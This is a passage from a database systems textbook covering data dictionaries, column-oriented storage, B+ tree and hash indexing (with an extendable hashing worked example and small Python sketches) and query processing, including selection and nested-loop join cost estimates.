• Tables defined in all databases. For example, the data dictionary is likely to store the name of the table creator, the date of creation, access authorizations, the number of columns, and so on.
• Indexes defined for each database table. For each index, the DBMS stores at least the index name, the attributes used, the location, specific index characteristics and the creation date.
• Defined databases: who created each database, the date of creation, where the database is located, who the DBA is, and so on.
• Programs that access the database, including screen formats, report formats, application formats, SQL queries, and so on.
• Relationships among data elements: which elements are involved, whether the
relationship is mandatory or optional, the connectivity and cardinality and so on.
If the data dictionary can be organized to include data external to the DBMS itself, it becomes an especially flexible tool for more general corporate resource management. The management of such an extensive data dictionary thus makes it possible to manage the use and allocation of all of the organization's information, regardless of whether it has its roots in the database.
Column-Oriented Storage
A column-oriented store database is a type of database that stores data using a column-oriented model. It speeds up the time required to answer a query and greatly improves disk I/O performance. It is helpful in data analytics and data warehousing, and the major motive of a columnar database is to read and write data efficiently. Examples of columnar databases include MonetDB, Apache Cassandra, SAP HANA and Amazon Redshift.
Column store databases use a concept called a keyspace. A keyspace is somewhat like a schema in the relational model. The keyspace contains all the column families (somewhat like tables in the relational model), which contain rows and columns, as shown in Figure 9.12.
Let us take a closer look at a column family. Consider the Figure 9.13.
• Each row can contain a different number of columns from the other rows, and the columns don't have to match the columns in the other rows (i.e., they can have different column names, data types, etc.).
• Each column is confined to its row; it doesn't span all rows as in a relational database. Each column contains a name/value pair, along with a timestamp. Note that this example uses Unix/Epoch time for the timestamp.
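A simple way to picture a column family is as nested name/value pairs keyed by the row key, each carrying its own timestamp. The sketch below uses invented employee data purely for illustration:

# Illustrative sketch: one column family, with rows keyed by a row key and each
# column holding a name/value pair plus the timestamp at which it was written.
row = {
    "emp-001": {                                     # row key
        "name":  {"value": "Steve",   "timestamp": 1625553600},
        "dept":  {"value": "Sales",   "timestamp": 1625553600},
        "bonus": {"value": 2500,      "timestamp": 1625640000},
    },
    "emp-002": {                                     # a row with different columns
        "name":  {"value": "Priya",   "timestamp": 1625553700},
        "city":  {"value": "Chennai", "timestamp": 1625553700},
    },
}

# Pick the most recently written column of a row using the timestamps.
latest = max(row["emp-001"].items(), key=lambda kv: kv[1]["timestamp"])
print(latest[0], latest[1]["value"])   # bonus 2500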
Row Construction
Figure 9.14 shows the breakdown of each element in the row.
• Row Key. Each row has a unique key, which is a unique identifier for that row.
• Timestamp. This provides the date and time that the data was inserted. This can be
used to determine the most recent version of data.
• Columnar databases can be used for different tasks; in particular, they receive the greatest attention in applications related to big data.
• The data in a columnar database is highly compressible, and the compression permits operations such as AVG, MIN and MAX to be performed efficiently on the columns.
• Efficiency and speed: analytical queries run faster in columnar databases.
• For loading incremental data, traditional row-oriented databases are more suitable than column-oriented databases.
• For online transaction processing (OLTP) applications, row-oriented databases are more appropriate than columnar databases.
CHAPTER – X
INDEXING AND HASHING
10.1. INTRODUCTION
An index for a file works like a catalogue in a library. Cards in alphabetic order tell us
where to find books by a particular author.
In real-world databases, indices like this might be too large to be efficient. We'll look at more sophisticated indexing techniques. There are two kinds of indices:
• Ordered indices: indices are based on a sorted ordering of the search-key values.
• Hash indices: indices are based on the values being distributed uniformly across a range of buckets. The bucket to which a value is assigned is determined by a function, called a hash function.
We will consider several indexing techniques. No one technique is the best. Each
technique is best suited for a particular database application. Methods will be evaluated
based on:
• Access Types - types of access that are supported efficiently, e.g., value-based search or range search.
• Access Time - time taken to find a particular data item, or set of items.
• Insertion Time - time taken to insert a new data item (includes time to find the right place to insert).
• Deletion Time - time to delete an item (includes time taken to find the item, as well as to update the index structure).
• Space Overhead - additional space occupied by the index structure.
We may have more than one index or hash function for a file. (The library may have
card catalogues by author, subject or title.)
The attribute or set of attributes used to look up records in a file is called the search key
(not to be confused with primary key, etc.).
A good compromise is to have a sparse index with one index entry per block.
• We are guaranteed to have the correct block with this method, unless record is on an
overflow block (actually could be several blocks).
Multi-Level Indices
1. Even with a sparse index, index size may still grow too large. For 100,000 records, 10
per block, at one index record per block, that's 10,000 index records. Even if we can fit
100 index records per block, this is 100 blocks.
2. If index is too large to be kept in main memory, a search results in several disk reads.
If there are no overflow blocks in the index, we can use binary search.
This will read as many as ⌈log2(b)⌉ blocks (as many as 7 for our 100 blocks).
If index has overflow blocks, then sequential search typically used, reading all b index
blocks.
The solution is to construct a sparse index on the index (Figure 10.4).
• Use binary search on outer index. Scan index block found until correct index record
found. Use index record as before - scan block pointed to for desired record.
• For very large files, additional levels of indexing may be required.
• Indices must be updated at all levels when insertions or deletions require it.
• Frequently, each level of index corresponds to a unit of physical storage (e.g.
indices at the level of track, cylinder and disk).
Updation
Regardless of what form of index is used, every index must be updated whenever a
record is either inserted into or deleted from the file.
Deletion
• If the deleted record was the last record with a particular search-key value, delete that search-key value from the index.
• For sparse indices, delete a key value by replacing the key value's entry in the index with the next search-key value. If the next search-key value already has an index entry, the entry is deleted instead of being replaced.
Insertion
• Dense index: if the search-key value does not appear in the index, insert it.
• Sparse index: no change unless a new block is created. (In this case, the first search-key value appearing in the new block is inserted into the index.)
Secondary Indices
• If the search key of a secondary index is not a candidate key, it is not enough to point to
just the first record with each search-key value because the remaining records with the
same search-key value could be anywhere in the file. Therefore, a secondary index must
contain pointers to all the records.
• To perform a lookup on Peterson, we must read all three records pointed to by entries in bucket 2.
• Only one entry points to a Peterson record, but three records need to be read.
• As the file is not ordered physically by cname, this may take 3 block accesses.
• Secondary indices must be dense, with an index entry for every search-key value, and a
pointer to every record in the file.
• They also impose serious overhead on database modification: whenever a file is updated,
every index must be updated.
Examples of secondary indices on the account file are shown in Fig. 10.5(a) and Fig. 10.5(b).
1. B+ tree file structure maintains its efficiency despite frequent insertions and deletions.
It imposes some acceptable update and space overheads.
2. A B+ tree index is a balanced tree in which every path from the root to a leaf is of the
same length.
3. Each non-leaf node in the tree must have between ⌈n/2⌉ and n children (and thus up to n-1 search keys), where n is fixed for a particular tree.
4. Special cases: if the root is not a leaf, it has at least 2 children. If the root is a leaf (that
is, there are no other nodes in the tree), it can have between 0 and (n − 1) values
1. A B+ tree index is a multilevel index but is structured differently from that of multi-level
index sequential files.
2. A typical node (Figure 10.6) contains up to n-1 search key values K1, K2, …, Kn-1, and n pointers P1, P2, …, Pn. Search key values in a node are kept in sorted order.
3. For leaf nodes, Pi (i = 1,…,n-1) points to either a file record with search key value Ki,
or a bucket of pointers to records with that search key value. Bucket structure is used if
search key is not a primary key, and file is not sorted in search key order. Pointer Pn (nth
pointer in the leaf node) is used to chain leaf nodes together in linear order (search key
order). This allows efficient sequential processing of the file.
A non-leaf node may hold up to n pointers and must hold at least ⌈n/2⌉ pointers. The number of pointers in a node is called the fan-out of the node.
The following figures represent B+ trees with n=3 and n=5.
Queries on a B+ tree are handled by a find(v) procedure: starting with C = root, at each non-leaf node we follow the pointer whose key range contains the search-key value v, until a leaf node is reached; the leaf is then examined for an entry with key v.
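A minimal sketch of this lookup is given below. The node layout (dictionaries with keys, children and records) is an assumption made for the example, not the structure used in the figures:

# Minimal sketch of find(v) on a B+ tree. A node is a dict:
#   inner node: {"leaf": False, "keys": [...], "children": [...]}
#   leaf node : {"leaf": True,  "keys": [...], "records": [...]}
from bisect import bisect_right

def find(root, v):
    c = root
    while not c["leaf"]:
        i = bisect_right(c["keys"], v)   # follow the child whose range contains v
        c = c["children"][i]
    for key, rec in zip(c["keys"], c["records"]):
        if key == v:                     # scan the leaf for the search-key value
            return rec
    return None

leaf1 = {"leaf": True, "keys": [1001, 1002], "records": ["rec1001", "rec1002"]}
leaf2 = {"leaf": True, "keys": [1003, 1004], "records": ["rec1003", "rec1004"]}
root = {"leaf": False, "keys": [1003], "children": [leaf1, leaf2]}
print(find(root, 1003))   # rec1003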
Insertion and deletion are more complicated, as they may require splitting or combining
nodes to keep the tree balanced.
Find the leaf node in which the search-key value would appear
1. If there is room in the leaf node, insert the value in the leaf node
2. Otherwise, split the node, then insert and propagate updates to parent nodes.
To delete a value:
1. Find the record to be deleted and remove it from the main file and from the bucket (if present).
2. If the bucket is now empty, remove the search-key value from the leaf node.
When insertion causes a leaf node to be too large, we split that node. Assume we wish
to insert a record with a value of “Clearview". There is no room for it in the leaf node
where it should appear. We now have n values (the n-1 search key values plus the new
one we wish to insert). We put the first ⌈n/2⌉ values in the existing node, and the remainder into a new node. Figure 10.9 shows the B+ tree before and after insertion of "Clearview".
The new node must be inserted into the B+ tree. We also need to update search key
values for the parent (or higher) nodes of the split leaf node (Except if the new node is
the leftmost one). Order must be preserved among the search key values in each node.
If the parent was already full, it will have to be split. When a non-leaf node is split, the
children are divided among the two new nodes. In the worst case, splits may be required
all the way up to the root. (If the root is split, the tree becomes one level deeper.)
Note: when we start a B+ tree, we begin with a single node that is both the root and a
single leaf. When it gets full and another insertion occurs, we split it into two leaf nodes,
requiring a new root.
Deleting records may cause tree nodes to contain too few pointers. Then we must
combine nodes. The result of deleting “Downtown" from the B+ tree of Fig 10.9 is
shown in Fig. 10.10.
In this case, the leaf node is empty and must be deleted. If we wish to delete “Perryridge"
from the B+ tree of Figure 10.9 the parent is left with only one pointer, and must be
coalesced with a sibling node. Sometimes higher-level nodes must also be coalesced. If
the root becomes empty as a result, the tree is one level less deep (Figure 10.11).
Sometimes the pointers must be redistributed to keep the tree balanced. Deleting
“Perryridge" from Figure 10.9 produces Figure 10.11.
1. The B+ tree structure is used not only as an index but also as an organizer for records
into a file.
2. In a B+ tree file organization, the leaf nodes of the tree store record instead of storing
pointers to records.
3. Since records are usually larger than pointers, the maximum number of records that can
be stored in a leaf node is less than the maximum number of pointers in a nonleaf node.
4. Leaf nodes are still required to be at least half full.
5. Insertion and deletion from a B+ tree file organization are handled in the same way as they are in a B+ tree index.
6. When a B+ tree is used for file organization, space utilization is particularly important.
We can improve the space utilization by involving more sibling nodes in redistribution
during splits and merges.
B tree indices are similar to B+ tree indices. The general structure of B tree is given in
Fig.10.12.
The difference is that a B tree eliminates the redundant storage of search-key values. In the B+ tree of Fig 10.7, some search-key values appear twice, whereas a B tree allows search-key values to appear only once, as shown in Fig 10.13. Thus, we can store the index in less space.
The advantages of B-trees do not outweigh their disadvantages. Generally, the structural simplicity of the B+ tree is preferred.
10.5 HASHING
The idea behind hashing is to provide a function h called a hash function or randomizing
function that is applied to the hash field value of a record and yields the address of the disk block
in which the record is stored. Hashing is typically implemented as a hash table through the use
of an array of records. Suppose that the array index range is from 0 to M-1 (Fig. 10.14) then we
have M slots whose addresses correspond to the array indexes. We choose a hash function that
transforms the hash field value into an integer between 0 and M-1. One common hash function is
h(K) = K mod M
which returns the remainder of the integer hash field value K after division by M; this
value is then used for the record address. Non-integer hash field values can be transformed into
integers before the mod function is applied. For character strings, the numeric (ASCII) codes
associated with character can be used in the transformation.
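A small sketch of this hash function, folding character strings into integers via their ASCII codes before taking the remainder (the slot count M = 10 is chosen arbitrarily for the example):

# Minimal sketch of the mod hash: map a hash-field value to one of M slots.
M = 10

def to_int(key):
    if isinstance(key, int):
        return key
    return sum(ord(ch) for ch in str(key))   # fold characters via ASCII codes

def h(key, m=M):
    return to_int(key) % m                   # h(K) = K mod M

print(h(3787))          # 7 -> record stored in slot 7
print(h("Perryridge"))  # 3 -> always the same slot for the same string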
1. Static hashing – the hash function maps search key value to a fixed set of locations
2. Dynamic hashing – the hash table can grow to handle more items at run time.
A collision occurs when the hash field value of a record that is being inserted hashes to an address that already contains a different record. In this situation, we must insert the new record in some other position, since its hash address is occupied. The process of finding another position is called collision resolution. The methods for collision resolution are as follows:
1. Open addressing: proceeding from the occupied position specified by the hash address, the program checks the subsequent positions in order until an unused position is found.
2. Chaining: various overflow locations are kept, usually by extending the array with a number of overflow positions. A pointer field is added to each record location, and the pointer of the occupied hash address location is set to the address of the overflow location.
3. Multiple hashing: the program applies a second hash function if the first results in a collision. If another collision results, the program uses open addressing or applies a third hash function and then uses open addressing if necessary.
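The sketch below illustrates the chaining idea with an in-memory table; the overflow chains are simply Python lists attached to each slot, which is a simplification of the overflow-pointer scheme described above:

# Minimal sketch of collision resolution by chaining: each of the M slots holds
# a small list (chain) of the records that hash to it.
M = 7

def h(key):
    return key % M

table = [[] for _ in range(M)]

def insert(key, record):
    table[h(key)].append((key, record))        # collisions simply extend the chain

def lookup(key):
    for k, rec in table[h(key)]:               # scan only the chain for this slot
        if k == key:
            return rec
    return None

insert(15, "A-101")
insert(22, "A-215")        # 22 % 7 == 15 % 7 == 1: collision, same chain
print(lookup(22))          # A-215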
Index schemes force us to traverse an index structure. Hashing avoids this kind of
unnecessary traversal.
Hashing involves computing the address of a data item by computing a function on the
search key value. A bucket is a unit of storage containing one or more entries (a bucket is
typically a disk block). A hash function h is a function from the set of all search key values K
to the set of all bucket addresses B as shown in Fig 10.15.
If two search keys Ki and Kj map to the same address, because h(Ki) = h(Kj), then the bucket
at the address obtained will contain records with both search key values. In this case we will
have to check the search key value of every record in the bucket to get the ones we want.
Insertion and deletion are simple.
Hash Functions
A good hash function gives an average-case lookup that is a small constant, independent
of the number of search keys. We hope records are distributed uniformly among the buckets.
The worst hash function maps all keys to the same bucket. The best hash function maps all keys
to distinct addresses. Ideally, distribution of keys to addresses is uniform and random.
Suppose we have 26 buckets, and map names beginning with ith letter of the alphabet
to the ith bucket.
Problem: This does not give uniform distribution. Many more names will be mapped to
“A" than to “X".
Typical hash functions perform some operation on the internal binary machine
representations of characters in a key. For example, compute the sum, modulo # of buckets, of
the binary representations of characters of the search key.
1. Open hashing occurs where records are stored in different buckets. Compute the hash
function and search the corresponding bucket to find a record.
2. Closed hashing occurs where all records are stored in one bucket. Hash function
computes addresses within that bucket. (Deletions are difficult.) Not used much in
database applications.
• If number is too large, we waste space. If number is too small, we get too many
“collisions", resulting in records of many search key values being in the same bucket.
Choosing the number to be twice the number of search key values in the file gives a
good space/performance tradeoff.
Hash Indices
1. A hash index organizes the search keys with their associated pointers into a hash file
structure.
2. We apply a hash function on a search key to identify a bucket, and store the key and its
associated pointers in the bucket (or in overflow buckets).
3. Strictly speaking, hash indices are only secondary index structures, since if a file itself
is organized using hashing, there is no need for a separate hash index structure on it.
• Choose hash function based on current file size. Get performance degradation as
file grows.
• Choose hash function based on anticipated file size. Space is wasted initially.
• Periodically re-organize hash structure as file grows. Requires selecting new hash
function, recomputing all addresses and generating new bucket assignments.
Costly, and shuts down database.
Extendable hashing is one form of dynamic hashing. Extendable hashing splits and
coalesces buckets as database size changes. This imposes some performance overhead,
but space efficiency is maintained. As reorganization is on one bucket at a time,
overhead is acceptably low.
Figure 10.16 shows an extendable hash structure. Note that the i appearing over the bucket address table tells how many bits are required to determine the correct bucket. It may be the case that several entries point to the same bucket. All such entries will have a common hash prefix, but the length of this prefix may be less than i.
So, we give each bucket an integer giving the length of the common hash prefix. This is shown in Figure 10.16 as ij. The number of bucket-address-table entries pointing to bucket j is then 2^(i - ij).
To insert a record with search-key value Kl:
Compute h(Kl) and use the first i bits of the hash value to index into the bucket address table, arriving at some bucket j.
If there is room in the bucket, insert the information in the bucket and insert the record in the file.
If the bucket is full, we must split the bucket and redistribute the records.
If a bucket is split, we may need to increase the number of bits we use in the hash.
1. If i = ij, then only one entry in the bucket address table points to bucket j.
Then we need to increase the size of the bucket address table so that we can include
pointers to the two buckets that result from splitting bucket j.
We increment i by one, thus considering more of the hash, and doubling the size of
the bucket address table.
Set ij and iz to i.
It is remotely possible, but unlikely, that the new hash will still put all of the records
in one bucket. If so, split again and increment i again.
2. If i > ij, then more than one entry in the bucket address table points to bucket j.
Then we can split bucket j without increasing the size of the bucket address table.
Note that all entries that point to bucket j correspond to hash prefixes that have the
same value on the leftmost ij bits.
We allocate a new bucket z, and set ij and iz to the original ij value plus 1.
Now adjust entries in the bucket address table that previously pointed to bucket j.
Leave the first half pointing to bucket j, and make the rest point to bucket z.
Deletion of records is similar. Buckets may have to be coalesced, and the bucket address table may have to be halved.
Hash Function: Suppose the global depth is X. Then the Hash Function returns X LSBs.
Example: Insert the keys 16, 4, 6, 22, 24, 10, 31, 7, 9, 20 and 26 into an extendable hash structure in which each bucket can hold three records.
Solution: First, calculate the binary form of each of the given numbers.
16- 10000
4- 00100
6- 00110
22- 10110
24- 11000
10- 01010
31- 11111
7- 00111
9- 01001
20- 10100
26- 11010
Initially, the global depth and local depth are always 1. Thus, the hashing frame looks like this:
Inserting 16:
The binary format of 16 is 10000 and global-depth is 1. The hash function returns 1 LSB of
10000 which is 0. Hence, 16 is mapped to the directory with id=0.
Inserting 4 and 6:
Both 4(100) and 6(110) have 0 in their LSB. Hence, they are hashed as follows:
Inserting 22: The binary form of 22 is 10110. Its LSB is 0. The bucket pointed by directory 0 is
already full. Hence, Over Flow occurs.
Since Local Depth = Global Depth, the bucket splits and directory expansion takes
place. Also, rehashing of numbers present in the overflowing bucket takes place after the split.
And, since the global depth is incremented by 1, the global depth is now 2. Hence, 16, 4, 6 and 22 are now rehashed w.r.t. 2 LSBs [16 (10000), 4 (100), 6 (110), 22 (10110)].
Note: The bucket that did not overflow remains untouched. But, since the number
of directories has doubled, we now have two directories, 01 and 11, pointing to the same bucket.
This is because the local depth of that bucket has remained 1, and any bucket having a local
depth less than the global depth is pointed to by more than one directory.
Inserting 24 and 10: 24 (11000) and 10 (01010) are hashed to the directories with
ids 00 and 10, respectively. Here, we encounter no overflow condition.
Inserting 31, 7, 9: All of these elements [31 (11111), 7 (00111), 9 (01001)] have either 01 or
11 as their 2 LSBs. Hence, they are mapped to the bucket pointed to by directories 01 and 11. We do not
encounter any overflow condition here.
Inserting 20: Insertion of data element 20 (10100) again causes an overflow.
Since the local depth of the bucket = global depth, directory expansion (doubling)
takes place along with bucket splitting, and the elements present in the overflowing bucket are
rehashed with the new global depth. The new hash table now looks like this:
Inserting 26: The global depth is 3. Hence, the 3 LSBs of 26 (11010), i.e. 010, are considered, so
26 maps to the bucket pointed to by directory 010, which is already full, and an overflow occurs.
Since the local depth of this bucket < global depth (2 < 3), the directories are not doubled;
only the bucket is split and its elements are rehashed.
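The split-and-double mechanics traced above can be captured in a few lines of code. The following is a minimal Python sketch (not taken from any particular DBMS), assuming the X-LSB hash function and the bucket capacity of three records used in the worked example; all class and variable names are illustrative.

# Minimal extendable hashing sketch using the X least-significant bits,
# with a bucket capacity of 3 as in the worked example above.
BUCKET_CAPACITY = 3

class Bucket:
    def __init__(self, local_depth):
        self.local_depth = local_depth
        self.keys = []

class ExtendableHash:
    def __init__(self):
        self.global_depth = 1
        b0, b1 = Bucket(1), Bucket(1)
        self.directory = [b0, b1]                 # index = X LSBs of the key

    def _dir_index(self, key):
        return key & ((1 << self.global_depth) - 1)

    def insert(self, key):
        bucket = self.directory[self._dir_index(key)]
        if len(bucket.keys) < BUCKET_CAPACITY:
            bucket.keys.append(key)
            return
        # Overflow: double the directory only when local depth = global depth.
        if bucket.local_depth == self.global_depth:
            self.directory = self.directory + self.directory
            self.global_depth += 1
        # Split the overflowing bucket into two buckets of local depth + 1.
        bucket.local_depth += 1
        new_bucket = Bucket(bucket.local_depth)
        high_bit = 1 << (bucket.local_depth - 1)
        for i in range(len(self.directory)):
            # Redirect the directory entries whose new distinguishing bit is 1.
            if self.directory[i] is bucket and (i & high_bit):
                self.directory[i] = new_bucket
        # Rehash the keys of the overflowing bucket, then retry the new key.
        old_keys, bucket.keys = bucket.keys, []
        for k in old_keys + [key]:
            self.insert(k)

h = ExtendableHash()
for k in [16, 4, 6, 22, 24, 10, 31, 7, 9, 20, 26]:
    h.insert(k)

Running the loop reproduces the walkthrough: the directory doubles when 22 and then 20 are inserted, while inserting 26 splits only the overflowing bucket because its local depth is below the global depth.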
Advantages
• Extendable hashing provides performance that does not degrade as the file grows.
• Minimal space overhead - no buckets need be reserved for future use. The bucket address
table contains only one pointer for each hash value of the current prefix length.
Disadvantages:
• Added complexity
To make a wise choice between the methods seen, the database designer must consider
issues such as the cost of periodic reorganization, the relative frequency of insertions and
deletions, and the types of queries expected.
The last issue is critical to the choice between indexing and hashing. If most queries are
of the form select A1, A2, …, An from r where Ai = c, then to process this query the
system will perform a lookup on an index or hash structure for attribute Ai with value
c.
Index lookup takes time proportional to log of number of values in R for Ai.
Hash structure provides lookup average time that is a small constant (independent of
database size).
Hash worst-case gives time proportional to the number of values in R for Ai.
Index methods are preferable where a range of values is specified in the query, e.g. select
A1, A2, …, An from r where Ai ≤ c2 and Ai ≥ c1. This query finds records with Ai values
in the range from c1 to c2.
Using an index structure, we can find the bucket for value c1, and then follow the pointer
chain to read the next buckets in alphabetic (or numeric) order until we find c2.
If we have a hash structure instead of an index, we can find a bucket for c1 easily, but
it is not easy to find the “next bucket".
Also, each bucket may be assigned many search key values, so we cannot chain them
together.
To support range queries using a hash structure, we need a hash function that preserves
order.
For example, if K1 and K2 are search key values and K1 < K2 then h(K1) < h(K2).
Order-preserving hash functions that also provide randomness and uniformity are
extremely difficult to find.
Thus, most systems use indexing in preference to hashing unless it is known in advance
that range queries will be infrequent.
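A rough in-memory analogy (illustrative only, not a DBMS implementation) makes the trade-off concrete: a hash structure answers Ai = c lookups in near-constant time, while an ordered structure also supports range retrieval.

import bisect

ages = [18, 21, 21, 25, 30, 34, 40, 52]      # values of attribute Ai kept in sorted order
hash_index = {}                              # hash structure on the same attribute
for pos, v in enumerate(ages):
    hash_index.setdefault(v, []).append(pos)

# Point query (Ai = 25): both structures handle this efficiently.
print(hash_index.get(25, []))                    # average constant-time lookup
print(ages[bisect.bisect_left(ages, 25)])        # O(log n) via the ordered index

# Range query (21 <= Ai <= 34): easy with the ordered index, but the hash
# structure offers no way to find the "next bucket" in key order.
lo = bisect.bisect_left(ages, 21)
hi = bisect.bisect_right(ages, 34)
print(ages[lo:hi])                               # [21, 21, 25, 30, 34]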
CHAPTER – XI
QUERY PROCESSING AND
OPTIMIZATION
Query Processing is the activity performed in extracting data from the database. The
steps involved are:
1. Parsing and translation
2. Optimization
3. Evaluation
Before query processing can begin, the system must translate the query into a usable
form. A language such as SQL is suitable for human use, but is ill suited to be the system’s
internal representation of a query. A more useful internal representation is one based on the
extended relational algebra.
Thus, the first action the system must take in query processing is to translate a given
query into its internal form. This translation process is similar to the work performed by the
parser of a compiler. In generating the internal form of the query, the parser checks the syntax
of the user’s query, verifies that the relation names appearing in the query are names of the
relations in the database, and so on. The system constructs a parse-tree representation of the
query, which it then translates into a relational-algebra expression. If the query was expressed
in terms of a view, the translation phase also replaces all uses of the view by the relational-
algebra expression that defines the view.
Suppose a user executes a query to fetch the records of the employees whose salary is
less than 75000. For doing this, the query is:
select * from employee where salary < 75000;
Thus, to make the system understand the user query, it needs to be translated in the form
of relational algebra. We can bring this query in the relational algebra form as:
σsalary < 75000 (employee)
After translating the given query, we can execute each relational algebra operation by
using different algorithms.
Optimization
The different evaluation plans for a given query can have different costs. We do not
expect users to write their queries in a way that suggests the most efficient evaluation plan.
Rather, it is the responsibility of the system to construct a query evaluation plan that minimizes
the cost of query evaluation; this task is called query optimization
In order to optimize a query, a query optimizer must know the cost of each operation.
Although the exact cost is hard to compute, since it depends on many parameters such as actual
memory available to the operation, it is possible to get a rough estimate of execution cost for
each operation. Usually, a database system generates an efficient query evaluation plan that
minimizes its cost. This task, performed by the database system, is known as query
optimization.
The cost of the query evaluation can vary for different types of queries. For optimizing
a query, the query optimizer should have an estimated cost analysis of each operation. It is
because the overall operation cost depends on the memory allocations to several operations,
execution costs, and so on.
Evaluation
For this, in addition to the relational algebra translation, it is required to annotate the
translated relational algebra expression with the instructions used for specifying and evaluating
each operation.
• A query execution engine is responsible for generating the output of the given query. It
takes the query execution plan, executes it, and finally makes the output for the user
query.
Finally, after selecting an evaluation plan, the system evaluates the query and produces
the output of the query.
The cost of a query plan is estimated by measuring its total resource
consumption. The selection operation is generally performed by a file scan. File scans are the
search algorithms that are used for locating and accessing the data; the file scan is the lowest-level
operator used in query processing.
In RDBMS or relational database systems, the file scan reads a relation only if the whole
relation is stored in one file only. When the selection operation is performed on a relation whose
tuples are stored in one file, it uses the following algorithms:
• Linear Search: In a linear search, the system scans each record to test whether it satisfies
the given selection condition. Accessing the first block of a file needs an initial
seek, and if the blocks of the file are not stored in contiguous order, extra
seeks are needed. Although linear search is the slowest search algorithm, it is
applicable in all cases: it does not depend on the nature of the
selection, the availability of indices, or the ordering of the file, whereas the other
algorithms are not applicable in all cases.
The index-based search algorithms are known as index scans. Such index structures are
known as access paths; these paths allow locating and accessing the data in the file. The
following algorithms use an index in query processing:
Primary index, equality on key: We use the index to retrieve a single record that satisfies the
equality condition, the equality comparison being performed on the primary-key attribute.
Primary index, equality on nonkey: The difference from equality on a key is that multiple
records may be fetched; several records can match the selection when the equality
comparison is on a nonkey attribute, and they are retrieved through the primary (clustering) index.
The selection that specifies an equality condition can use the secondary index. Using
secondary index strategy, we can either retrieve a single record when equality is on key or
multiple records when the equality condition is on nonkey. When retrieving a single record, the
time cost is equal to the primary index. In the case of multiple records, they may reside on
different blocks. This results in one I/O operation per fetched record, and each I/O operation
requires a seek and a block transfer.
For making a selection on the basis of a comparison in a relation, we can proceed
either by using a linear search or via indices in the following ways:
When the selection condition given by the user is a comparison, we can use a primary
ordered index, such as a primary B+-tree index. For example, when an attribute A of a relation
r is compared with a given value v as A > v, the primary index on A is used to locate the first
tuple satisfying the condition, and the file is then scanned from that point to the end, outputting
all tuples that satisfy the given selection condition.
A secondary ordered index can be used for a selection operation that involves
<, ≤, >, or ≥. In this case, the scan uses the blocks of the lowest-level index as follows:
(<, ≤): the scan goes from the smallest value up to the given value v.
(>, ≥): the scan goes from the given value v up to the maximum value.
However, the use of the secondary index should be limited for selecting a few records.
It is because such an index provides pointers to point each record, so users can easily fetch the
record through the allocated pointers. Such retrieved records may require an I/O operation as
records may be stored on different blocks of the file. So, if the number of fetched records is
large, it becomes expensive with the secondary index.
Conjunction:
A conjunctive selection is a selection of the form σ θ1∧θ2∧…∧θn (r).
A conjunction is the intersection of all records that satisfy each of the individual conditions θi.
Disjunction:
A disjunctive selection is a selection of the form σ θ1∨θ2∨…∨θn (r).
A disjunction is the union of all records that satisfy at least one of the given conditions θi.
Negation:
The result of a selection σ¬θ(r) is the set of tuples of the given relation r for which the selection
condition θ evaluates to false. In the absence of nulls, this is simply the set of tuples of
relation r that are not in σθ(r).
A composite index is one that is built on multiple attributes. Such an index may
be usable for some conjunctive selections. If the selection specifies an equality
condition on two or more attributes and a composite index is present on these combined
attribute fields, then the index can be searched directly; the type of composite index determines
which of the index algorithms described above is applied.
Conjunctive selection can also be implemented using the intersection of record pointers or
record identifiers. This implementation uses indices with record pointers on the fields involved
in the individual selection conditions. Each index is scanned for pointers to tuples satisfying its
individual condition; the intersection of all the retrieved pointers is the set of pointers to the
tuples that satisfy the conjunctive condition. The algorithm then uses these pointers to fetch the
actual records. If indices are not available on every individual condition, the retrieved records
are tested for the remaining conditions.
Disjunctive selection by the union of identifiers scans each index for pointers to tuples that
satisfy the individual conditions, but it is applicable only if access paths are available on all the
disjunctive selection conditions. The union of all fetched pointers gives the set of pointers to all
tuples that satisfy the disjunctive condition, and these pointers are then used to fetch the actual
records. However, if the access path is missing for even one of the conditions, a linear search
would be needed for that condition anyway, so it is usually best to use a single linear search for
the whole selection.
Join operation: Consider a theta join r ⋈θ s in which the join condition θ compares attributes A and B,
where A and B are attributes or sets of attributes of relations r and s, respectively. We use the
following statistics in our examples: the outer relation r has nr = 5,000 records stored in br = 100
blocks, and the inner relation s has ns = 10,000 records stored in bs = 400 blocks.
Nested-loop join: This algorithm computes the theta join of two relations r and s. It is called the
nested-loop join algorithm since it basically consists of a pair of nested for loops. Relation r is
called the outer relation and relation s the inner relation of the join; tr · ts denotes the tuple
constructed by concatenating the attribute values of tuples tr and ts. In the worst case, the buffer
can hold only one block of each relation, and a total of nr ∗ bs + br block transfers and nr + br seeks are required.
• In the worst case, the number of block transfers is 5000 ∗ 400+100 = 2,000,100, plus
5000+100 = 5100 seeks.
• If the roles of the two relations were reversed (the larger relation used as the outer relation),
the worst-case cost would have been 10,000 ∗ 100 + 400 = 1,000,400 block transfers, plus
10,400 disk seeks.
Block nested-loop join: Within each pair of blocks, every tuple in one block is paired with every tuple in the
other block to generate all pairs of tuples, and all pairs of tuples that satisfy the join condition are
added to the result. The primary difference in cost between the block nested-loop join and the
basic nested-loop join is that, in the worst case, each block in the inner relation s is read only
once for each block in the outer relation, instead of once for each tuple in the outer relation. In
the worst case, there will be a total of br ∗ bs + br block transfers, where br and bs denote the
number of blocks containing records of r and s, respectively. (A short sketch of this algorithm
appears after the list of possible improvements below.)
• In the worst case, a total of 100 ∗ 400+100 =40,100 block transfers plus 2∗100 = 200
seeks are required.
• The performance of the nested-loop and block nested-loop procedures can be further
improved as follows:
1. If the join attributes in a natural join or an equi-join form a key on the inner relation,
then for each outer relation tuple the inner loop can terminate as soon as the first match
is found.
2. Use the biggest unit of the outer relation that can fit in memory as the blocking unit,
while leaving enough space for the buffers of the inner relation and the output.
3. Scan the inner loop alternately forward and backward and thus reducing the number of
disk accesses needed.
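As mentioned above, a short sketch follows. It is a plain in-memory model in Python (illustrative only, not an actual DBMS executor): each relation is represented as a list of blocks, each block as a list of tuples, and the loop structure mirrors the block nested-loop algorithm, reading the inner relation once per outer block.

def block_nested_loop_join(r_blocks, s_blocks, theta):
    """Return all concatenated tuple pairs (tr + ts) that satisfy theta(tr, ts)."""
    result = []
    for outer_block in r_blocks:            # one pass over the outer relation r
        for inner_block in s_blocks:        # inner relation s scanned once per outer block
            for tr in outer_block:
                for ts in inner_block:
                    if theta(tr, ts):
                        result.append(tr + ts)
    return result

# Example: equi-join on the first attribute of each tuple.
r = [[(1, "a"), (2, "b")], [(3, "c")]]      # 2 blocks of r
s = [[(2, "x")], [(3, "y"), (4, "z")]]      # 2 blocks of s
print(block_nested_loop_join(r, s, lambda tr, ts: tr[0] == ts[0]))
# [(2, 'b', 2, 'x'), (3, 'c', 3, 'y')]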
